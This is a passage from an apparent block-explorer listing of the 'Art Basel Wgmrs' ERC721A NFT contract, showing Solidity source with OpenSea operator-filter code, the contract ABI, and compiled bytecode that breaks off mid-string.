        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract DefaultOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract ArtBaselWgmrs is ERC721A, DefaultOperatorFilterer {
    string public baseURI = "ipfs://bafybeihx3yniyooubup2harwo34w37i53gg4amzz2bwdowmkawru44oo3e/";      
    uint256 public maxSupply = 777; 
    uint256 public price = 0.0015 ether;
    uint256 public maxPerTx = 10;
    uint256 public maxFreePerAddr = 2;    

    mapping(address => uint256) _numForFree;
    mapping(uint256 => uint256) _numMinted;

    function mint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        if (msg.value == 0) {
            require(amount == 1 && _numMinted[block.number] < getFreeNum() && _numForFree[tx.origin] < maxFreePerAddr );
            _numForFree[tx.origin]++;
            _numMinted[block.number]++;
            _safeMint(msg.sender, 1);
        } else {
            require(amount <= maxPerTx);
            require(msg.value >= amount * price);
            _safeMint(msg.sender, amount);
        }
    }

    function reseve(address rec, uint256 amount) public onlyOwner {
        _safeMint(rec, amount);
    }    

    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseURI(string memory baseURI_) external onlyOwner {
        baseURI = baseURI_;
    }     

    address public owner;
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("Art Basel Wgmrs", "ABW") {
        owner = msg.sender;
    }
    
    function setPrice(uint256 newPrice, uint256 maxT) external onlyOwner {
        price = newPrice;
        maxPerTx = maxT;
    }

    function getFreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    // function royaltyInfo(uint256 _tokenId, uint256 _salePrice) public view virtual returns (address, uint256) {
    //     uint256 royaltyAmount = (_salePrice * 50) / 1000;
    //     return (owner, royaltyAmount);
    // }
    
    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    /////////////////////////////
    // OPENSEA FILTER REGISTRY 
    /////////////////////////////

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerAddr","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"rec","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"reseve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newPrice","type":"uint256"},{"internalType":"uint256","name":"maxT","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526040518060800160405280604381526020016200334b6043913960089080519060200190620000359291906200036f565b506103096009556605543df729c000600a55600a600b556002600c553480156200005e57600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280600f81526020017f41727420426173656c2057676d727300000000000000000000000000000000008152506040518060400160405280600381526020017f41425700000000000000000000000000000000000000000000000000000000008152508160029080519060200190620000fa9291906200036f565b508060039080519060200190620001139291906200036f565b50620001246200036a60201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111562000321578015620001e7576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b8152600401620001ad9291906200044d565b600060405180830381600087803b158015620001c857600080fd5b505af1158015620001dd573d6000803e3d6000fd5b5050505062000320565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614620002a1576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b8152600401620002679291906200044d565b600060405180830381600087803b1580156200028257600080fd5b505af115801562000297573d6000803e3d6000fd5b505050506200031f565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002ea919062000430565b600060405180830381600087803b1580156200030557600080fd5b505af11580156200031a573d6000803e3d6000fd5b505050505b5b5b505033600f60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000513565b600090565b8280546200037d90620004ae565b90600052602060002090601f016020900481019282620003a15760008555620003ed565b82601f10620003bc57805160ff1916838001178555620003ed565b82800160010185558215620003ed579182015b82811115620003ec578251825591602001919060010190620003cf565b5b509050620003fc919062000400565b5090565b5b808211156200041b57600081600090555060010162000401565b5090565b6200042a816200047a565b82525050565b60006020820190506200044760008301846200041f565b92915050565b60006040820190506200046460008301856200041f565b6200047360208301846200041f565b9392505050565b600062000487826200048e565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006002820490506001821680620004c757607f821691505b60208210811415620004de57620004dd620004e4565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b612e2880620005236000396000f3fe6080604052600436106101815760003560e01c80636c0360eb116100d1578063a22cb4651161008a578063d5abeb0111610064578063d5abeb011461052d578063e985e9c514610558578063f7d9757714610595578063f968adbe146105be57610181565b8063a22cb465146104ab578063b88d4fde146104d4578063c87b56dd146104f057610181565b80636c0360eb146103a657806370a08231146103d15780638da5cb5b1461040e57806395d89b4114610439578063a035b1fe14610464578063a0712d681461048f57610181565b80631fed285a1161013e57806341f434341161011857806341f43434146102f957806342842e0e1461032457806355f804b3146103405780636352211e1461036957610181565b80631fed285a1461029d57806323b872dd146102c65780633ccfd60b146102e257610181565b806301ffc9a714610186578063036a7b5a146101c357806306fdde03146101ee578063081812fc14610219578063095ea7b31461025657806318160ddd14610272575b600080fd5b34801561019257600080fd5b506101ad60048036038101906101a89190612628565b6105e9565b6040516101ba91906128cb565b60405180910390f35b3480156101cf57600080fd5b506101d861067b565b6040516101e59190612923565b60405180910390f35b3480156101fa57600080fd5b50610203610681565b6040516102109190612901565b60405180910390f35b34801561022557600080fd5b50610240600480360381019061023b91906126cb565b610713565b60405161024d919061283b565b60405180910390f35b610270600480360381019061026b91906125bb565b610792565b005b34801561027e57600080fd5b506102876108ab565b6040516102949190612923565b60405180910390f35b3480156102a957600080fd5b506102c460048036038101906102bf91906125bb565b6108c2565b005b6102e060048036038101906102db91906124a5565b61092a565b005b3480156102ee57600080fd5b506102f7610a8a565b005b34801561030557600080fd5b5061030e610b2d565b60405161031b91906128e6565b60405180910390f35b61033e600480360381019061033991906124a5565b610b3f565b005b34801561034c57600080fd5b5061036760048036038101906103629190612682565b610c9f565b005b34801561037557600080fd5b50610390600480360381019061038b91906126cb565b610d13565b60405161039d919061283b565b60405180910390f35b3480156103b257600080fd5b506103bb610d25565b6040516103c89190612901565b60405180910390f35b3480156103dd57600080fd5b506103f860048036038101906103f39190612438565b610db3565b6040516104059190612923565b60405180910390f35b34801561041a57600080fd5b50610423610e6c565b604051610430919061283b565b60405180910390f35b34801561044557600080fd5b5061044e610e92565b60405161045b9190612901565b60405180910390f35b34801561047057600080fd5b50610479610f24565b6040516104869190612923565b60405180910390f35b6104a960048036038101906104a491906126cb565b610f2a565b005b3480156104b757600080fd5b506104d260048036038101906104cd919061257b565b611097565b005b6104ee60048036038101906104e991906124f8565b6111b0565b005b3480156104fc57600080fd5b50610517600480360381019061051291906126cb565b611313565b6040516105249190612901565b60405180910390f35b34801561053957600080fd5b506105426113b2565b60405161054f9190612923565b60405180910390f35b34801561056457600080fd5b5061057f600480360381019061057a9190612465565b6113b8565b60405161058c91906128cb565b60405180910390f35b3480156105a157600080fd5b506105bc60048036038101906105b791906126f8565b61144c565b005b3480156105ca57600080fd5b506105d36114b8565b6040516105e09190612923565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061064457506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806106745750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b600c5481565b60606002805461069090612c09565b80601f01602080910402602001604051908101604052809291908181526020018280546106bc90612c09565b80156107095780601f106106de57610100808354040283529160200191610709565b820191906000526020600020905b8154815290600101906020018083116106ec57829003601f168201915b5050505050905090565b600061071e826114be565b610754576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561089c576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161080a929190612856565b60206040518083038186803b15801561082257600080fd5b505afa158015610836573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061085a91906125fb565b61089b57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610892919061283b565b60405180910390fd5b5b6108a6838361151d565b505050565b60006108b5611661565b6001546000540303905090565b3373ffffffffffffffffffffffffffffffffffffffff16600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461091c57600080fd5b6109268282611666565b5050565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610a78573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561099d57610998848484611684565b610a84565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016109e6929190612856565b60206040518083038186803b1580156109fe57600080fd5b505afa158015610a12573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a3691906125fb565b610a7757336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610a6e919061283b565b60405180910390fd5b5b610a83848484611684565b5b50505050565b3373ffffffffffffffffffffffffffffffffffffffff16600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ae457600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610b2a573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c8d573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610bb257610bad8484846119a9565b610c99565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610bfb929190612856565b60206040518083038186803b158015610c1357600080fd5b505afa158015610c27573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c4b91906125fb565b610c8c57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c83919061283b565b60405180910390fd5b5b610c988484846119a9565b5b50505050565b3373ffffffffffffffffffffffffffffffffffffffff16600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610cf957600080fd5b8060089080519060200190610d0f929190612237565b5050565b6000610d1e82611a33565b9050919050565b60088054610d3290612c09565b80601f0160208091040260200160405190810160405280929190818152602001828054610d5e90612c09565b8015610dab5780601f10610d8057610100808354040283529160200191610dab565b820191906000526020600020905b815481529060010190602001808311610d8e57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e1b576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610ea190612c09565b80601f0160208091040260200160405190810160405280929190818152602001828054610ecd90612c09565b8015610f1a5780601f10610eef57610100808354040283529160200191610f1a565b820191906000526020600020905b815481529060010190602001808311610efd57829003601f168201915b5050505050905090565b600a5481565b60095481610f366108ab565b610f409190612a08565b1115610f4b57600080fd5b600034141561106057600181148015610f7d5750610f67611b01565b600e600043815260200190815260200160002054105b8015610fc95750600c54600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b610fd257600080fd5b600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081548092919061102290612c6